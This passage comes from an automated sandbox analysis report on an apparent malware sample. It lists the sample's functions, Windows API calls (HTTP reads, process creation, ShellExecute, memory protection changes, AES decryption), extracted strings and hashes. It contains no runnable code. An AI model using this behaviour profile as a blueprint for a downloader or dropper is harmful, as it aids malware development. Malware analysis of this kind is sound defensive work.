                                    • HttpQueryInfoA.WININET(?,0000001D,?,00000103,00000000), ref: 10001298
                                    • CoCreateInstance.OLE32(?,00000000,00000001,100111B0,?), ref: 100012CA
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3309607086.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                    • Associated: 00000000.00000002.3309587632.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000000.00000002.3309627188.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000000.00000002.3309646682.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_10000000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID: FileInternet$CreateH_prolog3_HttpInfoInstancePointerQueryRead
                                    • String ID: text
                                    • API String ID: 1154000607-999008199
                                    • Opcode ID: 5bb6c959c08c52f1deca969ff5d7f0342f658ad243dbff8a6426dbc5f8fc3103
                                    • Instruction ID: b002d723a568eb8b1b2c33cfea8b8604ab2d7fe63d6740fb25dc42610badb9b0
                                    • Opcode Fuzzy Hash: 5bb6c959c08c52f1deca969ff5d7f0342f658ad243dbff8a6426dbc5f8fc3103
                                    • Instruction Fuzzy Hash: 62B14975900229AFEB65CF24CC85BDAB7B8FF09355F1041D9E508A7265DB70AE80CF90
                                    Function 10001F20 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 182processCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    APIs
                                      • Part of subcall function 10005956: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,10001F48,00000000), ref: 10005969
                                      • Part of subcall function 10005956: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 1000599A
                                    • CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 1000212B
                                    • ShellExecuteA.SHELL32(00000000,open,?,00000000,00000000,0000000A), ref: 10002155
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3309607086.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                    • Associated: 00000000.00000002.3309587632.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000000.00000002.3309627188.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000000.00000002.3309646682.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_10000000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID: Time$CreateExecuteFileProcessShellSystemUnothrow_t@std@@@__ehfuncinfo$??2@
                                    • String ID: .exe$open
                                    • API String ID: 1627157292-49952409
                                    • Opcode ID: fecaffcc8a5dd3a535f99b20f533ad3ad145e7b685b1384be33c82bc1a84d92d
                                    • Instruction ID: 97952a91a625a221cb26b3956644a393a6e3da00256d77b8c5daa8cab0653b15
                                    • Opcode Fuzzy Hash: fecaffcc8a5dd3a535f99b20f533ad3ad145e7b685b1384be33c82bc1a84d92d
                                    • Instruction Fuzzy Hash: 40514B715083809BE724DF64C881EDFB7E8FB95394F004A2EF69986195DB70A944CB62
                                    Function 00401D60 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 168COMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3306439694.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.3306439694.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: http://
                                    • API String ID: 0-1121587658
                                    • Opcode ID: abedc0d90a1f4d3688eb9c4f017047df236718ab065654b8d82d4035641d8820
                                    • Instruction ID: beb1f9afae3dc46702148b7d116b1b3e2c798cd3d3ea86b197954d74152ad0ce
                                    • Opcode Fuzzy Hash: abedc0d90a1f4d3688eb9c4f017047df236718ab065654b8d82d4035641d8820
                                    • Instruction Fuzzy Hash: F451C371E002099FDB14CFA8C885BEEBBB5EF48314F20812EE915B72C1D7799945CBA4
                                    Function 004055C0 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 44sleepCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3306439694.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.3306439694.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID: Sleep
                                    • String ID: SUB=
                                    • API String ID: 3472027048-145552029
                                    • Opcode ID: 215ed1e405e6368dfb5ba68c9b9ee9b1ec46e70625a89705628ba187409897b3
                                    • Instruction ID: 88daf57e9a9f6bf3b413cfac85103c48897bab337c773688da56e0d9a9d12cb3
                                    • Opcode Fuzzy Hash: 215ed1e405e6368dfb5ba68c9b9ee9b1ec46e70625a89705628ba187409897b3
                                    • Instruction Fuzzy Hash: AF0184F1D10248ABD710DFA9CD4ABDEBBB8EB14714F508139E924772C1D7785608CBA6
                                    Function 04B40E0F Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                                    Download Yara Rule
                                    APIs
                                    • SetErrorMode.KERNEL32(00000400,?,?,04B40223,?,?), ref: 04B40E19
                                    • SetErrorMode.KERNEL32(00000000,?,?,04B40223,?,?), ref: 04B40E1E
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3308616404.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_4b40000_4kahanaK78.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ErrorMode
                                    • String ID:
                                    • API String ID: 2340568224-0
                                    • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                    • Instruction ID: f91484002589e88e4a4d3f6ea8ab43fed4857b487d85ba7f5556b63228273427
                                    • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                    • Instruction Fuzzy Hash: 0BD0123154512877D7003A94DC09BCD7B1CDF09B62F008451FB0DD9080C770964046E6
                                    Function 00A9FA29 Relevance: 1.5, APIs: 1, Instructions: 48memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • VirtualProtect.KERNEL32(?,66705ADD,00000004,?), ref: 00A9FAB2
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3306653109.0000000000A9F000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A9F000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_a9f000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID: ProtectVirtual
                                    • String ID:
                                    • API String ID: 544645111-0
                                    • Opcode ID: 576726781f0fd2dd5e2b4b83f06ce4135b7ec36c81bc0fd8bdd748d64a912402
                                    • Instruction ID: c2e8d641b9485861ccb4d9618987ead3f95fb452efbc79d758d381a7881ca885
                                    • Opcode Fuzzy Hash: 576726781f0fd2dd5e2b4b83f06ce4135b7ec36c81bc0fd8bdd748d64a912402
                                    • Instruction Fuzzy Hash: C6F028FA308115AEEA00CE109E80ABF77E9D7813A0F309126F509C5D06C2744D559675
                                    Function 100079EE Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • RtlAllocateHeap.NTDLL(00000000,10001F83,?,?,10002743,10001F83,?,10001F83,0007A120), ref: 10007A20
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3309607086.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                    • Associated: 00000000.00000002.3309587632.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000000.00000002.3309627188.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000000.00000002.3309646682.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_10000000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID: AllocateHeap
                                    • String ID:
                                    • API String ID: 1279760036-0
                                    • Opcode ID: e19d539462f031469c69ea45d1cad77acc71583726438384a09bba2e4039781a
                                    • Instruction ID: 0f7b013f9e5e8caa32c185eac4a395cd376aa25861a87a311eefda30a96e0e36
                                    • Opcode Fuzzy Hash: e19d539462f031469c69ea45d1cad77acc71583726438384a09bba2e4039781a
                                    • Instruction Fuzzy Hash: 2FE0A035B0012266F711EA698C00B8F3A89FB832F0F124120AC489209ADA68DE0181E2
                                    Function 0041249E Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • RtlAllocateHeap.NTDLL(00000000,?,?,?,0040A15B,?,?,?,004010EC,?,004034A7,?,?,?), ref: 004124D0
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3306439694.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.3306439694.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID: AllocateHeap
                                    • String ID:
                                    • API String ID: 1279760036-0
                                    • Opcode ID: 493f356888a0dcd889554c34f33c7b2690b2cf14b3e600665f7a64bb4c109bb9
                                    • Instruction ID: ad8272dea5af250e00f6a395d7f300feb0e2b911a381963764dc482fc342fffd
                                    • Opcode Fuzzy Hash: 493f356888a0dcd889554c34f33c7b2690b2cf14b3e600665f7a64bb4c109bb9
                                    • Instruction Fuzzy Hash: B4E03031205225AAD73126A69E00BDB3A589B417A4F154233EC04E66D1DBAC9CE182AD
                                    Function 00A9FA5A Relevance: 1.5, APIs: 1, Instructions: 31memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • VirtualProtect.KERNEL32(?,66705ADD,00000004,?), ref: 00A9FAB2
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3306653109.0000000000A9F000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A9F000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_a9f000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID: ProtectVirtual
                                    • String ID:
                                    • API String ID: 544645111-0
                                    • Opcode ID: 65a839782d0a3c0724fff41ea93222962d1751b8fa2253e2ac73be11a759d03c
                                    • Instruction ID: aa8ce762a7fa5568c301584bf7dd8eac8c71e679f6a3c771b793f7f523d4685d
                                    • Opcode Fuzzy Hash: 65a839782d0a3c0724fff41ea93222962d1751b8fa2253e2ac73be11a759d03c
                                    • Instruction Fuzzy Hash: 2EF05CB7208105AEDF009F60DA80AFF77A4DB41310F344126F409C6D0AC1348D129B69
                                    Function 00A9FA7A Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3306653109.0000000000A9F000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A9F000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_a9f000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID: ProtectVirtual
                                    • String ID:
                                    • API String ID: 544645111-0
                                    • Opcode ID: 11f86ca3a1d6c2ded55710e9fa41e81f9fa65614f7e1e7819daafebeb2ef39e8
                                    • Instruction ID: e3c2c0b78ca854e4d271c42c2b3d79b8bc02c0990e1cc97dbd1a0ca66efa9ead
                                    • Opcode Fuzzy Hash: 11f86ca3a1d6c2ded55710e9fa41e81f9fa65614f7e1e7819daafebeb2ef39e8
                                    • Instruction Fuzzy Hash: 44F0E5BA20520A9FCB009F20894069EB761FF45314F385165E45447E0AC331AC269BC5
                                    Function 10005BF4 Relevance: 1.5, APIs: 1, Instructions: 11COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • _free.LIBCMT ref: 10005C07
                                      • Part of subcall function 10007A3C: RtlFreeHeap.NTDLL(00000000,00000000,?,100066F0), ref: 10007A52
                                      • Part of subcall function 10007A3C: GetLastError.KERNEL32(?,?,100066F0), ref: 10007A64
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3309607086.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                    • Associated: 00000000.00000002.3309587632.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000000.00000002.3309627188.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000000.00000002.3309646682.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_10000000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID: ErrorFreeHeapLast_free
                                    • String ID:
                                    • API String ID: 1353095263-0
                                    • Opcode ID: d102fdbbc19008656020672b0513dbd0600b00c460041e1c03a0ef10da910664
                                    • Instruction ID: c87f8b0a48b83a8a7248450826a19003e4aa18d6d81e39a7cffe4d34c565a0dd
                                    • Opcode Fuzzy Hash: d102fdbbc19008656020672b0513dbd0600b00c460041e1c03a0ef10da910664
                                    • Instruction Fuzzy Hash: D9C04C75500208BBDB05DF45DD06A4E7BA9EB812A4F204054F41567291DAB5EF449691
                                    Function 0040E268 Relevance: 1.5, APIs: 1, Instructions: 11COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • _free.LIBCMT ref: 0040E27B
                                      • Part of subcall function 00411AC2: RtlFreeHeap.NTDLL(00000000,00000000,?,00417074,?,00000000,?,?,?,0041709B,?,00000007,?,?,0041737A,?), ref: 00411AD8
                                      • Part of subcall function 00411AC2: GetLastError.KERNEL32(?,?,00417074,?,00000000,?,?,?,0041709B,?,00000007,?,?,0041737A,?,?), ref: 00411AEA
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3306439694.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.3306439694.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID: ErrorFreeHeapLast_free
                                    • String ID:
                                    • API String ID: 1353095263-0
                                    • Opcode ID: db01065975d67949ddfc68d95b64cc0fb921476d903cbe9e9cdf5676f9f73183
                                    • Instruction ID: def2e2de252ffdbb94672f6279d5865abf5ab7644d9ffbe49541578f7e328dd5
                                    • Opcode Fuzzy Hash: db01065975d67949ddfc68d95b64cc0fb921476d903cbe9e9cdf5676f9f73183
                                    • Instruction Fuzzy Hash: 82C08C31100208BBCB00DB46C806B8E7FA8DB803A8F204049F40417251DAB1EE409680
                                    Function 00A9FAAC Relevance: 1.5, APIs: 1, Instructions: 9memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • VirtualProtect.KERNEL32(?,66705ADD,00000004,?), ref: 00A9FAB2
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3306653109.0000000000A9F000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A9F000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_a9f000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID: ProtectVirtual
                                    • String ID:
                                    • API String ID: 544645111-0
                                    • Opcode ID: 13df1bb06a575fa7a725ef7417a1e16c84471aa900746d9d03f4d6d5b0d4d6f9
                                    • Instruction ID: 4559c0496328d75c9245cac291c15f9e7fff5c514c7ad33c7a4d35649763e278
                                    • Opcode Fuzzy Hash: 13df1bb06a575fa7a725ef7417a1e16c84471aa900746d9d03f4d6d5b0d4d6f9
                                    • Instruction Fuzzy Hash: 67C08C3A30824A6BDB009F24458036F3B219BC0600F7C8020AA080BE8EC6749C538B84
                                    Function 00D89485 Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • VirtualAlloc.KERNEL32(00000000,?,00001000,00000040), ref: 00D894D6
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3307293303.0000000000D89000.00000040.00000020.00020000.00000000.sdmp, Offset: 00D89000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_d89000_4kahanaK78.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AllocVirtual
                                    • String ID:
                                    • API String ID: 4275171209-0
                                    • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                    • Instruction ID: 9a5b3f9bc58d7feb4256cd89fc8baa81124e2b5f1b868f91978ac3b01c2ce790
                                    • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                    • Instruction Fuzzy Hash: 18113F79A00208EFDB01DF98C985E99BBF5EF08350F098094F9489B361D375EA50DF90
                                    Function 00402BF0 Relevance: 1.3, APIs: 1, Instructions: 9memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • VirtualAlloc.KERNEL32(?,?,?,?), ref: 00402BFF
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3306439694.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.3306439694.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID: AllocVirtual
                                    • String ID:
                                    • API String ID: 4275171209-0
                                    • Opcode ID: ca1f9d2fe36c7284753979306af93d0cb1d2fe33a661f06d3f51028e1cfc8f97
                                    • Instruction ID: c3e6f36c677934e3fb1d6ceeea9da9d01375f90aa72a3d22a0593b590ebbe711
                                    • Opcode Fuzzy Hash: ca1f9d2fe36c7284753979306af93d0cb1d2fe33a661f06d3f51028e1cfc8f97
                                    • Instruction Fuzzy Hash: F7C0013200020DFBCF025F81EC0489A7F2AEB09264F008020FA1804021C7329931ABA9
                                    Function 00402C10 Relevance: 1.3, APIs: 1, Instructions: 8COMMON
                                    Download Yara Rule
                                    APIs
                                    • VirtualFree.KERNELBASE(?,?,?), ref: 00402C1C
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3306439694.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.3306439694.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID: FreeVirtual
                                    • String ID:
                                    • API String ID: 1263568516-0
                                    • Opcode ID: 5ceef4664e2463bb707098a5d0699c231cbc0156091deadbe1fb1452187b7f9f
                                    • Instruction ID: 60d78a83612f02709208ad56537e98f16bf966ab6139b9664c308e167d28ca00
                                    • Opcode Fuzzy Hash: 5ceef4664e2463bb707098a5d0699c231cbc0156091deadbe1fb1452187b7f9f
                                    • Instruction Fuzzy Hash: 61B0923244020CFBCF021F81EC048D93F2AFB08264F008024FA1C44031C733D531AB84

                                    Non-executed Functions

                                    Function 04B43727 Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 225encryptionCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CryptAcquireContextW.ADVAPI32(?,00000000,?,00000018,F0000000,0042A018), ref: 04B437A7
                                    • CryptCreateHash.ADVAPI32(?,0000800C,00000000,00000000,?), ref: 04B437CB
                                    • _mbstowcs.LIBCMT ref: 04B4381E
                                    • CryptHashData.ADVAPI32(?,00000000,?,00000000), ref: 04B43835
                                    • GetLastError.KERNEL32 ref: 04B4383F
                                    • CryptDeriveKey.ADVAPI32(?,0000660E,?,00000000,?), ref: 04B43867
                                    • GetLastError.KERNEL32 ref: 04B43871
                                    • CryptReleaseContext.ADVAPI32(?,00000000), ref: 04B43881
                                    • CryptDecrypt.ADVAPI32(?,00000000,00000000,00000000,?,00000000), ref: 04B43943
                                    • CryptDestroyKey.ADVAPI32(?), ref: 04B439B5
                                    Strings
                                    • Microsoft Enhanced RSA and AES Cryptographic Provider, xrefs: 04B43783
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3308616404.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_4b40000_4kahanaK78.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Crypt$ContextErrorHashLast$AcquireCreateDataDecryptDeriveDestroyRelease_mbstowcs
                                    • String ID: Microsoft Enhanced RSA and AES Cryptographic Provider
                                    • API String ID: 3642901890-63410773
                                    • Opcode ID: e8a2417c6fd1f5a0234f20e664ae74c119de5196ead524865740bbc4210dc3f9
                                    • Instruction ID: 4fe274e54d431eebfbc365bd5b69b411441be6651f31eb9a9068311ca2197b44
                                    • Opcode Fuzzy Hash: e8a2417c6fd1f5a0234f20e664ae74c119de5196ead524865740bbc4210dc3f9
                                    • Instruction Fuzzy Hash: F6818471B00218AFEF209F24CC45B9ABBB5FF89300F0481E5E94DE7290DB319A849F55
                                    Function 04CE3EC0 Relevance: 18.9, APIs: 3, Strings: 7, Instructions: 1423COMMON
                                    Download Yara Rule
                                    APIs
                                    • __Init_thread_footer.LIBCMT ref: 04CE402D
                                    • __Init_thread_footer.LIBCMT ref: 04CE434B
                                    • __Init_thread_footer.LIBCMT ref: 04CE4C47
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000003.2594383754.0000000004CE0000.00000004.00001000.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_3_4ce0000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID: Init_thread_footer
                                    • String ID: DFEK$Q)9$rB$rB$rB$rB$rB
                                    • API String ID: 1385522511-4104243848
                                    • Opcode ID: ad6c51d0c23db519bf42d9139585622d1c3407f5fc4ce6c149f0e084eac9c7f9
                                    • Instruction ID: 1b1ff71d75617c38a21d7feca300b4e25a84579fffecd1471adf6667b41be81d
                                    • Opcode Fuzzy Hash: ad6c51d0c23db519bf42d9139585622d1c3407f5fc4ce6c149f0e084eac9c7f9
                                    • Instruction Fuzzy Hash: 38C2F470E00258DBEB28EF65DC447FDBB76AF04308F5481A8D4096B291DB74AF84DB95
                                    Function 04B44D27 Relevance: 16.4, APIs: 5, Strings: 4, Instructions: 629sleepCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 04B493D7: RtlEnterCriticalSection.NTDLL(0042AF64), ref: 04B493E2
                                      • Part of subcall function 04B493D7: RtlLeaveCriticalSection.NTDLL(0042AF64), ref: 04B4941F
                                    • __Init_thread_footer.LIBCMT ref: 04B44E94
                                    • Sleep.KERNEL32(00000BB8,00000000,?,04B4659E,0041B9C0,0042BA48,0042BA49), ref: 04B450BC
                                    • __Init_thread_footer.LIBCMT ref: 04B451B2
                                    • Sleep.KERNEL32(000007D0), ref: 04B4552A
                                    • Sleep.KERNEL32(000007D0), ref: 04B45544
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3308616404.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_4b40000_4kahanaK78.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Sleep$CriticalInit_thread_footerSection$EnterLeave
                                    • String ID: DFEK$updateSW$rB$rB
                                    • API String ID: 2213498749-3506205476
                                    • Opcode ID: fedcac95627ff82dc7824c58def76200c42a9a8a38efeeb3af7ee738ebcd6dfb
                                    • Instruction ID: 195c4b848b535703c47e7aa2a10455d41de4d29fa14b2bc4b342385004724538
                                    • Opcode Fuzzy Hash: fedcac95627ff82dc7824c58def76200c42a9a8a38efeeb3af7ee738ebcd6dfb
                                    • Instruction Fuzzy Hash: 4042F4B0A002649BEF34DF24CC487ADBBB1EF85308F1441E9D8096B291DB75AE84DF95
                                    Function 0098BFEA Relevance: 14.1, Strings: 10, Instructions: 1629COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3306653109.0000000000819000.00000040.00000001.01000000.00000003.sdmp, Offset: 00819000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_819000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: 7>{f$7c7{$9yW]$:#$N){$b-F1$u[@>$v"Go$v2a$|[
                                    • API String ID: 0-346324137
                                    • Opcode ID: 30a028d36ec981f82d2ddd6a3ec2be7d54e32cf64f64d9265aa029cdf19dd5d9
                                    • Instruction ID: 0286c2ca2b09c395569eb9a1b5b603d4090339d17d674d31d92615c811e15dc9
                                    • Opcode Fuzzy Hash: 30a028d36ec981f82d2ddd6a3ec2be7d54e32cf64f64d9265aa029cdf19dd5d9
                                    • Instruction Fuzzy Hash: 92B228F360C2049FE3086E29EC8577ABBE9EF94320F16853DEAC5C7744EA3558058796
                                    Function 00992BDC Relevance: 11.6, Strings: 8, Instructions: 1640COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3306653109.0000000000819000.00000040.00000001.01000000.00000003.sdmp, Offset: 00819000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_819000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: !w~;$"L?o$1? $7/m$?<o^$G~~l$b"7$mcU?
                                    • API String ID: 0-2181865516
                                    • Opcode ID: 5558245cd3e5cbfca98d65f10ce8c89e898c93a7f115d13f06da999400cc8e8d
                                    • Instruction ID: 34451f5e0596c2edc7e99ff7b603a4a555d561f05d0702519c1ff7c403b6a6f3
                                    • Opcode Fuzzy Hash: 5558245cd3e5cbfca98d65f10ce8c89e898c93a7f115d13f06da999400cc8e8d
                                    • Instruction Fuzzy Hash: 03B206F360C204AFE308AE2DEC8567ABBE5EF94320F16493DE6C5C3744E63598458697
                                    Function 009910B0 Relevance: 10.4, Strings: 7, Instructions: 1603COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3306653109.0000000000819000.00000040.00000001.01000000.00000003.sdmp, Offset: 00819000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_819000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: !g?$!o'$&o~$(/}$.9?$:{$"_
                                    • API String ID: 0-2666421078
                                    • Opcode ID: 6e3df8e2dd13b7518fc3e1311ebc3320351003b049075deddc043f8b41b3785c
                                    • Instruction ID: 63e1354e6404f3559d5b48e3823aa1224d2786c0ec94e5b5e57dae01f060d8ef
                                    • Opcode Fuzzy Hash: 6e3df8e2dd13b7518fc3e1311ebc3320351003b049075deddc043f8b41b3785c
                                    • Instruction Fuzzy Hash: 37B214F3A0C2149FE3046F2DEC8567ABBE5EF94720F1A4A3DEAC5C7744E63558408692
                                    Function 00983C20 Relevance: 10.3, Strings: 7, Instructions: 1590COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3306653109.0000000000819000.00000040.00000001.01000000.00000003.sdmp, Offset: 00819000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_819000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: 1V~$2Rr{$3&{v$?V^$Kr^<$KyO~$<>[
                                    • API String ID: 0-2579797082
                                    • Opcode ID: 4d67f2d9ff450c6f314abdc8e8ceffeee0bf8523af8e0c7cfb5e8f86e71ac690
                                    • Instruction ID: b2fcf2050b114dcccb01503e231875de4692b4cf7a96b54abee20948ad5ab208
                                    • Opcode Fuzzy Hash: 4d67f2d9ff450c6f314abdc8e8ceffeee0bf8523af8e0c7cfb5e8f86e71ac690
                                    • Instruction Fuzzy Hash: ECB2E5F360C2009FE7046E29EC8567AFBE9EF94720F1A493DEAC4C3744E67598058697
                                    Function 004188AA Relevance: 10.2, APIs: 1, Strings: 4, Instructions: 1451COMMON
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3306439694.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.3306439694.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID: __floor_pentium4
                                    • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                    • API String ID: 4168288129-2761157908
                                    • Opcode ID: 14c724df0906a7543d709f4d96d1b8b7f4ee31c8485c5baae612bd997d7771c3
                                    • Instruction ID: d7ffb76180c9728a397d1ccf0e686cee7d0516322be8d88619d78ced8c4d9a03
